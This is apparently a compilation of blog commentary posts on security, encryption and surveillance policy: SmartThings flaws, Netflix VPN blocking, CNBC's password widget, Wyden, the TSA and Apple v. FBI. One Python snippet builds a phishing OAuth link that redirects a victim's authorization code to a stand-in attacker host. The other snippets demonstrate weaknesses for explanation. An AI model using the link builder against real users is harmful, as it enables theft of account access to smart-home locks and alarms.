Stop us if you've heard this one before: a new study has found that the "Internet of Things" may bring some added convenience, but at the high price of severe security vulnerabilities. Researchers at the University of Michigan say they've uncovered (pdf) some major new vulnerabilities in Samsung's SmartThings platform that could allow an attacker to unlock doors, modify home access codes, create false smoke detector alarms, or put security and automation devices into vacation mode. Researchers say this can be done by tricking users into either installing a malicious app from the SmartThings store, or by clicking a malicious link.
The URL attack relies on SmartThings' flawed implementation of the OAuth authentication protocol. In short, a malicious URL can be used to trick the consumer into giving up his login tokens without the slightest indication anything has gone wrong, while providing an attacker with the ability to create his own backdoor -- into your front door:
"Broadly, this part of the attack involves getting a victim to click on a link that points to the authentic SmartThings domain with only the redirect_uri portion of the link replaced with an attacker controlled domain. The victim should not suspect anything since the URL indeed takes the victim to the genuine HTTPS login page of SmartThings. Once the victim logs in to the real SmartThings Web page, SmartThings automatically redirects to the specified redirect URI with a 6 character codeword. At this point, the attacker can complete the OAuth flow using the codeword and the client ID and secret pair obtained from the third-party app’s bytecode independently."
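To make the mechanics concrete, here's a minimal Python sketch of how such a link could be assembled. The endpoint URL, client ID, and scope below are illustrative assumptions, not SmartThings' actual values:

```python
from urllib.parse import urlencode

# Illustrative placeholders only: the real SmartThings endpoint and client id
# differ. In the attack described, the client id/secret pair was recovered
# from the third-party app's bytecode.
AUTH_ENDPOINT = "https://graph.api.smartthings.com/oauth/authorize"
CLIENT_ID = "extracted-client-id"

def craft_phishing_url(attacker_redirect: str) -> str:
    """Build an authorization link that is genuine in every respect except
    redirect_uri, which points at a domain the attacker controls."""
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,             # legitimate id, harvested from the app
        "scope": "app",
        "redirect_uri": attacker_redirect,  # the only altered component
    }
    return f"{AUTH_ENDPOINT}?{urlencode(params)}"

# The victim lands on the real HTTPS SmartThings login page, so nothing looks
# wrong; after login, the short authorization code is delivered to the
# attacker's server, which can then finish the OAuth flow itself.
url = craft_phishing_url("https://attacker.example/capture")
print(url)
```

The standard defense here is strict server-side validation of redirect_uri against the exact URI registered for that client, which is precisely what the researchers found SmartThings failed to do.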
If the malicious URL approach isn't used, attackers can also rely on tricking consumers into downloading a malicious app that -- for example -- might claim to offer insight into device battery consumption, but can actually give an attacker the keys to your kingdom. This is due in part, the researchers note, to the fact that 42% of the over 500 apps in the SmartThings store are given significantly more system privileges than they actually need to accomplish the task at hand:
"We found that SmartApps were significantly overprivileged: (a) 55% of SmartApps did not use all the rights to device operations that their requested capabilities implied; and (b) 42% of SmartApps were granted capabilities that were not explicitly requested or used. In many of these cases, overprivilege was unavoidable, due to the device-level authorization design of the capability model and occurred through no fault of the developer. Worryingly, we have observed that 68 existing SmartApps are already taking advantage of the overprivilege to provide extra features, without requesting the relevant capabilities."
"The potential vulnerabilities disclosed in the report are primarily dependent on two scenarios - the installation of a malicious SmartApp or the failure of third party developers to follow SmartThings guidelines on how to keep their code secure," a SmartThings representative said. "Following this report, we have updated our documented best practices to provide even better security guidance to developers."
The problem is that the report clearly notes neither of these two scenarios is all that unlikely. In an admittedly small survey of 22 SmartThings users, the study found that 91% would let a battery monitoring app check the status of their smart lock. Yet just 14% of those polled believed that providing such access could involve the app being able to send door access codes to a remote server. The study, and Samsung's reaction to it, are just another example of how, if you really want a smart and secure home, "dumber" solutions -- like dead bolts and a dog -- remain the more intelligent option.
When Netflix recently expanded into 190 different countries, we noted that the company ramped up its efforts to block customers that use VPNs to watch geo-restricted content. More accurately, Netflix stepped up its efforts to give the illusion it seriously cracks down on VPN users, since the company has basically admitted that trying to block such users is largely impossible since they can just rotate IP addresses and use other tricks to avoid blacklists. And indeed, that's just what most VPN providers did, updating their services so they still work despite the Netflix crackdown.
Netflix's frankly overstated "crackdown" is an effort to soothe international broadcasters, justly worried about licensing content to a company that is demolishing decades-old broadcasting power centers. But superficial as it may be, Netflix's crackdown on VPNs still managed to erode user privacy and security, since obviously there are countless people using VPNs for reasons other than engaging in global Netflix tourism.
There was uproar from customers, some of whom simply use VPNs to protect their privacy, with a petition calling for the ban to be lifted attracting over 40,000 signatures. But Netflix, which generally cherishes its user experience, doesn't seem fussed by this uprising.
“It’s a very small but quite vocal minority,” CEO Reed Hastings said during this week’s earnings call. “So it’s really inconsequential to us, as you could see in the Q1 results.”
And, if looking solely at growth, he's not wrong; the company reported that it now serves 81.5 million members, 42% of whom are now outside of the United States. That's more than 47 million subscribers in the States alone, more than double Comcast's latest tally of 22,347,000 TV customers. While investors are worried about growing competition from Amazon and grandfathered customers' reaction to next month's price hike (actually announced two years ago), most customers, VPN or otherwise, aren't leaving.
And while Netflix may be annoying some VPN users now, the company has repeatedly stated that its ultimate goal is to eliminate geographic broadcast restrictions entirely. That not only makes it so Netflix tourism is unnecessary, but it should reduce piracy -- something Netflix Chief Product Officer Neil Hunt reiterated earlier this year at CES:
“Our ambition is to do global licensing and global originals, so that over maybe the next five, 10, 20 years, it’ll become more and more similar until it’s not different”... “We don’t buy only for Canada; we’re looking… for all territories; buying a singular territory is not very interesting any more.... When we have global rights, there’s a significant reduction in piracy pressure on that content. If a major title goes out in the U.S. but not in Europe, it’s definitely pirated in Europe, much more than it is if it’s released simultaneously,” Mr. Hunt says.
In other words, Netflix's long-term vision may be to eliminate fractured broadcast licensing so users don't need to use VPNs. But in the short term, Netflix should probably try a little harder to avoid alienating its more technically savvy customers. They may be "inconsequential" now during Netflix's heyday, but they may prove important once Netflix's streaming battle against Amazon, Hulu, Apple, and countless other companies starts to heat up.
People's passwords and their relative strength and weakness is a subject I know quite well. As part of my business, we regularly battle users who think very simple passwords, oftentimes relating to their birthdays and whatnot, are sufficient. Sometimes they simply make "password" or a similar variant their go-to option. So, when CNBC put together a widget for readers to input the passwords they use to get feedback on their strength or weakness, I completely understand what they were attempting to accomplish. Password security is a real issue, after all -- which is what makes it all the more face-palming that the widget CNBC used was found to be exploitable.
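For what it's worth, the kind of check such a tool performs can be approximated in a few lines. This is a toy sketch: real estimators model dictionaries of leaked passwords, keyboard patterns, and much more, and the blacklist here is purely illustrative:

```python
import re

# A tiny illustrative blacklist; real checkers use lists of millions
# of previously leaked passwords.
COMMON = {"password", "passw0rd", "123456", "qwerty", "letmein"}

def naive_strength(pw: str) -> str:
    """Toy strength rating: blacklist lookup plus simple character-class rules."""
    if pw.lower() in COMMON:
        return "very weak"
    score = sum([
        len(pw) >= 12,                         # long enough
        bool(re.search(r"[a-z]", pw)),         # has lowercase
        bool(re.search(r"[A-Z]", pw)),         # has uppercase
        bool(re.search(r"\d", pw)),            # has a digit
        bool(re.search(r"[^A-Za-z0-9]", pw)),  # has a symbol
    ])
    return ["very weak", "weak", "weak", "fair", "strong", "strong"][score]

print(naive_strength("password"))       # -> very weak
print(naive_strength("Tr0ub4dor&3x!"))  # -> strong
```

The crucial caveat, and the whole point of what follows: a check like this should run locally, never by shipping the password off to somebody's web page.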
A columnist for CNBC’s The Big Crunch tried to make a misguided point about the FBI’s iPhone situation with an interactive tool that asked readers to input their password to see how secure it was. The post is now down, but if you did comply with the CNBC request, it might be a good idea to change your password. A few people on Twitter claimed the widget was an insecure form that actually submitted the characters entered into the text field to third parties.
Since it’s a form field, it reloads the page when you hit “enter,” changing the URL and, in effect, saving the password you just typed in.
“In theory, if there’s someone sniffing traffic on your network, they could see these urls being requested in plain text, and then try sniffing on other traffic coming from you that might indicate some account information,” [Gawker Media's Adam] Pash told me. This could be as easy as finding out your email address. And it wouldn’t be hard for these ad trackers to collect a bunch of people’s passwords in their logs.
So while CNBC’s cool tool is not necessarily malicious, it’s more just sloppy. “I’m not sure it’s a serious threat,” says Pash. “But it’s definitely dumb.”
Dumb in general, yes, but all the more dumb specifically because the widget was created to educate readers on password security, while it simultaneously opened up a security threat vector against those same readers. This is the kind of thing that is almost too hysterical to be true. The very concept of attempting to educate the public about password security by developing an online widget and asking them to input their passwords is hilariously self-contradicting. Whatever the list of password dos and don'ts includes, it must certainly include something about not simply typing your passwords into online forms for fun. Add to this that CNBC didn't use HTTPS, and it's difficult to see what its widget did right on matters of security.
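The mechanics of the leak are easy to demonstrate: a form submitted via GET appends its fields to the requested URL itself, so the password rides along in cleartext. The page URL and field name below are hypothetical stand-ins, not CNBC's actual ones:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical widget page; note plain HTTP, as on the actual CNBC page.
PAGE = "http://widget.example/password-quiz"

def url_after_submit(password: str) -> str:
    """The URL a browser requests when the user hits Enter in a GET form."""
    return f"{PAGE}?{urlencode({'password': password})}"

# Anyone sniffing the network -- or any third-party script that logs page
# URLs -- sees the submitted password in the clear.
leaked = url_after_submit("hunter2")
observed = parse_qs(urlparse(leaked).query)["password"][0]
print(leaked)
print(observed)  # -> hunter2
```

This is why sensitive form fields are submitted via POST over HTTPS: the field values travel in the encrypted request body rather than in a URL that gets logged, cached, and broadcast to every tracker on the page.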
And, if the social media accusations are true and CNBC was indeed sharing data with third parties, including the passwords that users were inputting into the widget, then this goes from laugh-inducing to dumpster fire fairly quickly. And, keep in mind that all of this was done supposedly to educate readers about password security. For CNBC to then start sharing those passwords with third parties? That kind of thing earns you an IT death sentence.
CNBC apparently realized its mistake and took the widget down, but not before teaching its readers a valuable security lesson, albeit not the one it had intended to teach: Don't put your passwords into an online widget, no matter who put it up. That's just dumb.
Yesterday, at the excellent RightsCon event in San Francisco, Senator Ron Wyden gave a barn burner of a speech, in which he detailed why it was so important to protect our privacy and security in a digital age, at a time when law enforcement and the intelligence communities are digging deeper and deeper into all of our personal information. He started out with a clear and emphatic statement on how he will block any attempt by Congress to undermine encryption:
I am here to tell you why I will use every power I have as a senator to block plans to weaken strong encryption. I am here to tell you why FBI Director Comey’s plans and expected legislation will be a lose-lose -- they would lead to less security and less liberty.
Furthermore, he made it clear that anyone who says that this is just a debate between privacy and security has it totally wrong:
And let me be clear at the outset that the debate about data security is not about choosing security or choosing privacy. It is about choosing less security or choosing more security. People who think that the government should have more surveillance powers will often try to frame this debate as a choice between privacy and security. They are wrong. Our job is to convince the public that when politicians or the news media say that, we are here to tell you it’s not the case. It’s less security versus more security.
He further pointed out that, contrary to the claims of James Comey and others in law enforcement, this is the "golden age of surveillance" in that modern technologies have given law enforcement much more access to private information than they've ever had before. And he compared the freakout claims from law enforcement to similar claims 50 years ago, when the Supreme Court ruled in Miranda v. Arizona that law enforcement had to read people their rights -- and law enforcement and the media insisted this would lead to much more criminal activity:
I think that it is useful to compare this discussion to another one that was playing out fifty years ago. Fifty years ago this summer, the Supreme Court handed down a landmark decision in the case of Miranda vs. Arizona, in which the Court ruled that before law enforcement officers interrogate a suspect, they must advise that person of his or her constitutional rights. Everyone who’s ever watched a TV cop show knows this – you have the right to remain silent, you have the right to an attorney, and so forth. Today, this is a very important feature of the American justice system. It helps ensure that poor people know that they have the same rights under the law as rich people who can afford high-priced lawyers. And it helps reduce the likelihood of innocent people who are unsure about their rights being pressured to sign false confessions. The Miranda ruling helped bring our country closer to the promise of equal justice for all.
But if you had been following the public debate back in the summer of 1966, you would have heard a lot of politicians and prosecutors saying that the sky was falling. A few weeks after the decision, a New York Times headline read “Miranda Decision Said to End Effective Use of Confessions.” The article quoted some of the most respected prosecutors and law enforcement officials in the country warning that this decision was an absolute catastrophe. Future president Richard Nixon called the ruling a “Dickensian legalism” that would “hamstring” law enforcement, and he even suggested that the Constitution should be amended to overturn it.
Needless to say, the sky did not fall. In fact, crime rates have been dropping for the past twenty or thirty years. The national murder rate and burglary rate are both lower than they were the day that the Miranda ruling was handed down. Obviously there are a lot of factors that go into crime rates, but I think it’s clear that despite all of the dire warnings from both politicians and respected law enforcement officials, this ruling did not lead to the end of law enforcement in America. Fifty years later, the Miranda ruling remains a cornerstone of American due process.
He also laid out a concrete agenda for the fight ahead:
Protecting strong encryption to safeguard Americans’ private data. Wyden’s Secure Data Act would ban the government from forcing companies to build backdoors or otherwise weaken the security of their products.
Overhauling the Third Party Doctrine to make clear individuals do not lose their privacy rights just because they share some of their personal information with a particular company.
Increasing transparency by holding at least three congressional hearings each year on the privacy impacts of surveillance laws, authorities and practices.
Being on high alert for fresh attempts to undermine checks on government power. Right now the Justice Department is seeking a change to the rules for getting warrants to track computer hackers that would allow DOJ to use a single warrant to remotely access any computer that a suspected hacker is believed to have broken into. This rule change could potentially allow federal investigators to use a single warrant to access millions of computers, and it would treat the victims of the hack the same as the hacker himself.
Finally, the government must do much more to hire people who understand technology and the implications of weakening digital security and privacy.
He spent some time in his speech blasting the concept of the third party doctrine and how ridiculous it is in practice:
Here’s the problem. A few decades ago, courts began ruling that if you provide information to a third party, like your bank or your phone company, you are no longer keeping it private, and it is no longer protected under the Fourth Amendment to the Constitution.
There is a huge, glaring problem with that logic. When you share your information with a single private company, that is not the same thing as making it public. Your phone company may have records of who you call, and your bank may have records of how you spend your money, but your contract with them will have rules for when and how they are allowed to share that information. They are not allowed to just disclose it freely.
This is true in the digital world as well. When I post a handsome new profile picture on Facebook, or send out a tweet to tell people that I’m holding a town hall in Oregon, I’ve chosen to make that information public. But when I send an email to my wife, or store a document in the cloud so I can work on it later, my service provider and I have an agreement that my information will stay private. The premise in current law is that I have agreed to make that information public just because my service provider is holding it. And that premise is simply absurd.
It's yet another great speech on an important topic from Senator Wyden -- and he includes a call to action to get people who support this vision to speak out on it. As it stands right now there are a few others in Congress who get how important all of this is, but many do not. And that needs to change. And while many people will be quite cynical about this and say that we'll never get others in Congress to recognize this issue, Senator Wyden reminded everyone that many people had the same view about SOPA/PIPA and the public eventually shifted Congress' position on that as well:
We can win this fight for security and liberty. It obviously won’t be easy, but we’ve done it before. Remember, in January of 2012, we were talking about the anti-Internet SOPA and PIPA bills. The first vote was on whether to override my hold on PIPA. Talk about long odds. The Chamber of Commerce, Hollywood, all the powerful special interests were against us. When that debate started, no one gave us a chance. Then the Internet community mobilized. Websites went dark in protest. And when the dust settled, well, everyone here knows how that ended. We won. Let’s work together and do it again.
While I do worry about the tendency of some to always roll out the "SOPA example" as proof, it is true that when enough people speak up, all the lobbyists and money in the world can be defeated. And this is a time when it would be nice to see that happen again.
from the another-security-theater-script-rewrite-in-the-works dept
Another terrorist attack somewhere in the world* has provoked another round of punditry from former government officials on how to protect America from future attacks. Over the coming weeks, there will be no shortage of stupid ideas, useless ideas and pointless discussions about "heightened security" at any place people gather.
*"World" = Western Europe only
None of it will matter. Security has never really been scaled back anywhere since the 9/11 attacks -- certainly not to the levels seen prior to September 2001. There's only so much security anyone can actually provide but endless off-Broadway productions of security theater to be explored.
Take former DHS boss Michael Chertoff, who offered this:
“Well I have to say this is something I’ve spoken to people about for some time. The actual portion of the airport before the checkpoint is not really controlled by the federal government, it’s controlled by the local authorities. And it has increasingly become vulnerable, because as people wait to go through security they actually congregate there.”
I'm not sure the local boys will appreciate this dig at their security skills. But Chertoff's "solution" is just a literal expansion of federal government territory.
“And so now there’s an effort I think on the part of TSA to start to move the airports into pushing the security envelope back. We’ve seen some of that in terms of not allowing you to park in front of the terminal, but I think we’re going to have to step that up.”
So… move the target. Instead of being deep inside the airport, it will be closer to the entrance. As Gawker's Alex Pareene notes, at some point you can't push the envelope back any further. And there's no expansion point that will magically protect fliers from terrorist attacks.
Ah. Of course. We’ll “push the security envelope back.” The old checkpoints created crowds, sure, but once we move the security checkpoints back, just a bit further (to just before you enter the airport, I guess), it will be much safer for everyone, at least once everyone gets past the new checkpoints. Maybe eventually we can push the security envelope back to before you get in your car to go to the airport—your garage door, maybe?
Push people closer to the entrance. Make them more vulnerable to car bombs/larger groups of attackers. Push the envelope all the way out to the connecting roads. Same problem but with the added bonus of intrusive vehicle searches for everyone heading to the airport, whether they're planning to fly or not. There's no point where traveler safety suddenly spikes. Every nudge of the envelope opens as many attack vectors as it shuts down.
That's the ridiculousness of the TSA. It has done almost nothing to make flying safer. The only thing anyone can say for sure is that the TSA has made flying more annoying.
Maybe they'll move the checkpoints. Maybe they won't. Airplanes aren't the target. People are. And people are everywhere. To paraphrase Abraham Lincoln, you can't save all of the people all of the time, but you can make most of them miserable most of the time. That's how the DHS works. Actions must always be followed by reactions specifically tailored to address the parameters of the last attack or perceived threat. Somehow, we'll be safer by staying one step behind and ceding control to the government.
The unintended but entirely predictable consequences from the UK's disastrous Counter-Terrorism and Security Act keep on a-coming. You will recall that this handy piece of legislation tasked teachers with weeding out possible future-terrorists amongst the young folks they are supposed to be teaching. This has devolved instead into teachers reporting children, usually children who would be peripherally identified as Muslim, to the authorities for what aren't so much transgressions as kids being kids. It has even turned some teachers into literal grammar police, because the universe is not without a sense of humor.
And now we learn that these part-teacher-part-security-agents may be incorporating art criticism into their repertoire, having reported a four-year-old Muslim boy to the authorities over his inability to properly illustrate a cucumber.
Concerns were raised after the youngster drew a picture of a man cutting the vegetable. [The child's mother] said she feared her children would be taken away from her and added: "But I haven't done anything wrong... It was a horrible day." Teachers and public service workers have a legal obligation to report any concerns of extremist behaviour to the authorities since July.
And here is the picture the child drew of himself cutting a cucumber.
Now, if we hold our nose and choose to forget for a moment that this is a four-year-old we're talking about, and not the re-animated corpse of Vincent van Gogh, we might all agree that the picture on the left looks like a person holding a giant freaking sword, instead of a kitchen knife. The picture on the right will look like pretty much anything you want it to look like because, again, this is a four-year-old toddler we're talking about. So, it appears the teachers asked the child what he was attempting to draw in the picture, and the response would have been benign, except it hit one of the terrorism buzz-words, kinda sorta.
Staff in Luton told the child's mother they believed he was saying "cooker bomb" instead of "cucumber".
"[The member of staff] kept saying it was this one picture of the man cutting the cucumber....which she said to me is a 'cooker bomb', and I was baffled," she told the BBC Asian Network.
So the child, in addition to being unable to draw a cucumber sufficiently to get teachers to understand the portrayal he was attempting, also wasn't able to properly pronounce the word cucumber, and it apparently came out of his mouth close enough to "cooker bomb" for the nursery staff to freak out and into the de-radicalization program the child goes. I can't stress enough that this child is four years old.
Nor can I stress enough that the staff's interpretations here don't make any sense. So they believed the child was saying he was sawing into a cooker bomb with a death-sword? And that's a more plausible scenario than the staff concluding that this toddler was doing something completely innocent and wasn't articulating properly?
One wonders, as always, just how much leeway would have been afforded the boy if he had pale skin and blue eyes.
The US government has made numerous attempts to obtain source code from tech companies in an effort to find security flaws that could be used for surveillance or investigations.
The government has demanded source code in civil cases filed under seal but also by seeking clandestine rulings authorized under the secretive Foreign Intelligence Surveillance Act (FISA), a person with direct knowledge of these demands told ZDNet. We're not naming the person as they relayed information that is likely classified.
With these hearings held in secret and away from the public gaze, the person said that the tech companies hit by these demands are losing "most of the time."
That's hardly heartening. The DOJ would only go so far as to confirm this has happened before, likely because there's no way to deny it. The documents from the Lavabit case have been made public -- with the DOJ using a formerly-sealed document to hint at what could be in store for Apple if it refuses to write FBiOS for it.
Unfortunately, because of the secrecy surrounding the government's requests for source code -- and the court where those requests have been made -- it's extremely difficult to obtain outside confirmation. ZDNet's Zack Whittaker contacted more than a dozen Fortune 500 companies about the unnamed official's claims and received zero comments.
A few, however, flatly denied ever having handed over source code to the US government.
Cisco said in an emailed statement: "We have not and we will not hand over source code to any customers, especially governments."
IBM referred to a 2014 statement saying that the company does not provide "software source code or encryption keys to the NSA or any other government agency for the purpose of accessing client data." A spokesperson confirmed that the statement is still valid, but did not comment further on whether source code had been handed over to a government agency for any other reason.
Cisco is likely still stinging from leaked documents showing its unwitting participation in an NSA unboxing photo shoot and has undoubtedly decided to take a stronger stance against government meddling since that point. As for IBM, its statement is a couple of years old and contains a major qualifying statement.
Previously-leaked documents somewhat confirm the existence of court orders allowing the NSA to perform its own hardware/software surgery. Presumably, the introduction of backdoors and exploits is made much easier with access to source code. Whittaker points to Kaspersky Lab's apparent discovery of evidence pointing to the NSA being in possession of "several hard drive manufacturers'" source code -- another indication that the government's history of demanding source code from manufacturers and software creators didn't begin (or end) with Lavabit.
The government may be able to talk the FISA court into granting these requests, given that its purview generally only covers foreign surveillance (except for all the domestic dragnets and "inadvertent" collections) and national security issues. The FBI's open air battle with Apple has already proceeded far past the point that any quasi-hearing in front of the FISC would have. That's the sort of thing an actually adversarial system -- unlike the mostly-closed loop of the FISA court -- tends to result in: a give-and-take played out (mostly) in public, rather than one party saying "we need this" and the other applying ink to the stamp.
In all the discussions about Apple v. the FBI, a few people occasionally ask what would happen if Apple's engineers just refused to write the code demanded (some also ask about writing the code, but purposely messing it up). And now it appears that at least some Apple engineers are thinking about just this scenario. According to the NY Times:
Apple employees are already discussing what they will do if ordered to help law enforcement authorities. Some say they may balk at the work, while others may even quit their high-paying jobs rather than undermine the security of the software they have already created, according to more than a half-dozen current and former Apple employees.
As the NY Times notes, these details certainly add some pretty hefty weight to the First Amendment arguments about "compelled speech" that Apple has made (and that the EFF doubled down on in its amicus brief). As for what then would happen... that's up to the court, but it's likely that the court would find Apple in contempt and/or start fining it. But that still leaves open the question of how does it comply if not a single engineer is willing to help out.
This particular legal dispute gets more interesting day by day...
This weekend, John Oliver's Last Week Tonight dug into the Apple/FBI encryption fight. Not surprisingly, Oliver's take is much clearer and much more accurate than many mainstream press reports on the issues in the case, appropriately mocking the many law enforcement officials who seem to think that, just because Apple employs smart engineers, they can somehow do the impossible and "safely" create a backdoor into an encrypted iPhone that won't have dangerous consequences. He even spends a bit of time reviewing the original Crypto Wars over the Clipper Chip and highlights cryptographer Matt Blaze's contribution in ending those wars by showing that the Clipper Chip could be hacked.
But the biggest contribution to the debate -- which I hope that people pay most attention to -- is the point that Oliver made in the end with his faux Apple commercial. Earlier in the piece, Oliver noted that this belief among law enforcement that Apple engineers can somehow magically do what they want is at least partially Apple's own fault, with its somewhat overstated marketing. So, Oliver's team made a "more realistic" Apple commercial which noted that Apple is constantly fighting security cracks and vulnerabilities and is consistently just half a step ahead of hackers with malicious intent (and, in many cases, half a step behind them).
This is the key point: Building secure products is very, very difficult and even the most secure products have security vulnerabilities in them that need to be constantly watched and patched. And what the government is doing here is not only asking Apple to not patch a security vulnerability that it has found, but actively forcing Apple to create a new vulnerability and then effectively forcing Apple to keep it open. For all the talk of how Apple can just create the backdoor just this once and throw it away, this is more like asking Apple to set off a bomb that blows the back off all houses in a city, and then saying, "okay, just throw away the bomb after you set it off."
Hopefully, as in cases like net neutrality, Oliver's piece does its job in informing the public what's really going on.
This is not all that surprising, but President Obama, during his SXSW keynote interview, appears to have joined the crew of politicians making misleading statements pretending to be "balanced" on the question of encryption. The interview (the link above should start at the very beginning) talks about a variety of issues related to tech and government, but eventually the President zeroes in on the encryption issue. The embed below should start at that point (if not, it's at the 1 hour, 16 minute mark in the video). Unfortunately, the interviewer, Evan Smith of the Texas Tribune, falsely frames the issue as one of "security v. privacy" rather than what it actually is -- which is "security v. security."
In case you can't watch that, the President says he won't comment directly on the Apple legal fights, but then launches into the standard politician talking point of "yes, we want strong encryption, but bad people will use it so we need to figure out some way to break in."
If you watch that, the President is basically doing the same thing as all the Presidential candidates, stating that there's some sort of equivalency on both sides of the debate and that we need to find some sort of "balanced" solution short of strong encryption that will somehow let in law enforcement in some cases.
This is wrong. This is ignorant.
To his at least marginal credit, the President (unlike basically all of the Presidential candidates) did seem to acknowledge the arguments of the crypto community, but then told them all that they're wrong. In some ways, this may be slightly better than those who don't understand the actual issues at all, but it's still problematic.
Let's go through this line by line.
All of us value our privacy. And this is a society that is built on a Constitution and a Bill of Rights and a healthy skepticism about overreaching government power. Before smartphones were invented, and to this day, if there is probable cause to think that you have abducted a child, or that you are engaging in a terrorist plot, or you are guilty of some serious crime, law enforcement can appear at your doorstep and say 'we have a warrant to search your home' and they can go into your bedroom to rifle through your underwear to see if there's any evidence of wrongdoing.
Again, this is overstating the past and understating today's reality. Yes, you could always get a warrant to go "rifle through" someone's underwear, if you could present probable cause that such a search was reasonable to a judge. But that does not mean that the invention of smartphones really changed things so dramatically as President Obama presents here. For one, there has always been information that was inaccessible -- such as information that came from an in-person conversation or information in our brains or information that has been destroyed.
In fact, as lots of people have noted, today law enforcement has much more recorded evidence that it can obtain, totally unrelated to the encryption issue. This includes things like location information or information on people you called. That information used to not be available at all. So it's hellishly misleading to pretend that we've entered some new world of darkness for law enforcement when the reality is that the world is much, much brighter.
And we agree on that. Because we recognize that just like all our other rights, freedom of speech, freedom of religion, etc. there are going to be some constraints that we impose in order to make sure that we are safe, secure and living in a civilized society. Now technology is evolving so rapidly that new questions are being asked. And I am of the view that there are very real reasons why we want to make sure that government cannot just willy nilly get into everyone's iPhones, or smartphones, that are full of very personal information and very personal data. And, let's face it, the whole Snowden disclosure episode elevated people's suspicions of this.
That was a real issue. I will say, by the way, that -- and I don't want to go too far afield -- but the Snowden issue vastly overstated the dangers to US citizens in terms of spying. Because the fact of the matter is that actually our intelligence agencies are pretty scrupulous about US persons -- people on US soil. What those disclosures did identify were excesses overseas with respect to people who are not in this country. A lot of those have been fixed. Don't take my word for it -- there was a panel that was constituted that just graded all the reforms that we set up to avoid those charges. But I understand that that raised suspicions.
Again, at least some marginal kudos for admitting that this latest round was brought on by "excesses" (though we'd argue that it was actually unconstitutional, rather than mere overreach). And nice of him to admit that Snowden actually did reveal such "excesses." Of course, that raises a separate question: Why is Obama still trying to prosecute Snowden when he's just admitted that what Snowden did was clearly whistleblowing, in revealing questionable spying?
Also, the President is simply wrong that it was just about issues involving non-US persons. The major reform that has taken place wasn't about US persons at all, but rather about Section 215 of the PATRIOT Act, which was used almost entirely on US persons to collect all their phone records. So it's unclear why the President is pretending otherwise. The stuff outside of the US is governed by Executive Order 12333, and there's been no evidence at all that the President has changed that. I do agree, to some extent, that many believe in an exaggerated view of NSA surveillance, and that's distracting. But the underlying issues about legality and constitutionality -- and the possibilities for abuse -- absolutely remain.
But none of that actually has to do with the encryption fight, beyond the recognition -- accurately -- that the government's actions, revealed by Snowden, caused many to take these issues more seriously. And, on that note, it would have been at least a little more accurate for the President to recognize that it wasn't Snowden who brought this on the government, but the government itself by doing what it was doing.
So we're concerned about privacy. We don't want government to be looking through everybody's phones willy-nilly, without any kind of oversight or probable cause or a clear sense that it's targeted who might be a wrongdoer.
What makes it even more complicated is that we also want really strong encryption. Because part of us preventing terrorism or preventing people from disrupting the financial system or our air traffic control system or a whole other set of systems that are increasingly digitalized is that hackers, state or non-state, can just get in there and mess them up.
So we've got two values. Both of which are important.... And the question we now have to ask is, if technologically it is possible to make an impenetrable device or system where the encryption is so strong that there's no key. There's no door at all. Then how do we apprehend the child pornographer? How do we solve or disrupt a terrorist plot? What mechanisms do we have available to even do simple things like tax enforcement? Because if, in fact, you can't crack that at all, government can't get in, then everybody's walking around with a Swiss bank account in their pocket. So there has to be some concession to the need to be able to get into that information somehow.
The answer to the questions in that final paragraph is good old fashioned detective work. In a time before smartphones, detectives were still able to catch child pornographers or disrupt terrorist plots. And, in some cases, the government failed to stop either of those things. But it wasn't because strong encryption stymied them; it's because there are always going to be some plots that people get away with. We shouldn't undermine our entire security setup just because there are some bad people out there. In fact, that makes us less safe.
Also: tax enforcement? Tax enforcement? Are we really getting to the point that the government wants to argue that we need to break strong encryption to better enforce taxes? Really? Again, there are lots of ways to go after tax evasion. And, yes, there are lots of ways that people and companies try to hide money from the IRS. And sometimes they get away with it. To suddenly say that we should weaken encryption because the IRS isn't good enough at its job just seems... crazy.
Now, what folks who are on the encryption side will argue, is that any key, whatsoever, even if it starts off as just being directed at one device, could end up being used on every device. That's just the nature of these systems. That is a technical question. I am not a software engineer. It is, I think, technically true, but I think it can be overstated.
This is the part that's most maddening of all. He almost gets the point right. He almost understands. The crypto community has been screaming from the hills for ages that introducing any kind of third party access to encryption weakens it for all, introducing vulnerabilities that ensure that those with malicious intent will get in much sooner than they would otherwise. The President is mixing up that argument with one of the other arguments in the Apple/FBI case, about whether it's about "one phone" or "all the phones."
But even assuming this slight mixup is a mistake, and that he does recognize the basics of the arguments from the tech community, to have him then say that this "can be overstated" is crazy. A bunch of cryptography experts -- including some who used to work for Obama -- laid out in a detailed paper the risks of undermining encryption. To brush that aside as some sort of rhetorical hyperbole -- to brush aside the realities of cryptography and math -- is just crazy.
Encryption expert Matt Blaze (whose research basically helped win Crypto War 1.0) responded to this argument by noting that the "nerd harder, nerds" argument fundamentally misunderstands the issue:
Figuring out how to build the reliable, secure systems required to "compromise" on crypto has long been a central problem in CS.
If you can't read that, Blaze is basically saying that all crypto includes backdoors -- they're known as vulnerabilities. And the key focus in crypto is closing those backdoors, because leaving them open is disastrous. And yet the government is now demanding that tech folks purposely put in more backdoors and not close them, without recognizing the simple fact that vulnerabilities in crypto always lead to disastrous results.
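The structural problem Blaze is pointing at can be sketched in a few lines of code. The following is a deliberately toy construction (the XOR "cipher," key sizes, and message contents are all illustrative, not real cryptography) showing why an escrow-style "golden key" is a single point of failure: every message ships with a second copy the escrow key can open, so one stolen key reads all traffic from all users.

```python
# Toy sketch (NOT real cryptography) of a key-escrow scheme as a
# single point of failure. All names and values here are hypothetical.
import hashlib
import secrets

def keystream(key: bytes, length: int) -> bytes:
    """Derive a deterministic pseudo-random keystream from a key (toy)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def encrypt(key: bytes, plaintext: bytes) -> bytes:
    # XOR stream cipher: encryption and decryption are the same operation.
    return bytes(a ^ b for a, b in zip(plaintext, keystream(key, len(plaintext))))

decrypt = encrypt

ESCROW_KEY = secrets.token_bytes(32)  # the mandated "golden key"

def send_message(user_key: bytes, plaintext: bytes) -> tuple[bytes, bytes]:
    # Under escrow, every message carries a second copy that the escrow
    # key can open -- this second copy IS the deliberate backdoor.
    return encrypt(user_key, plaintext), encrypt(ESCROW_KEY, plaintext)

# Many users, each with their own key...
secrets_list = [b"medical records", b"bank login", b"trade secrets"]
messages = [send_message(secrets.token_bytes(32), m) for m in secrets_list]

# ...but one stolen escrow key opens every message from every user.
leaked = [decrypt(ESCROW_KEY, escrow_copy) for _, escrow_copy in messages]
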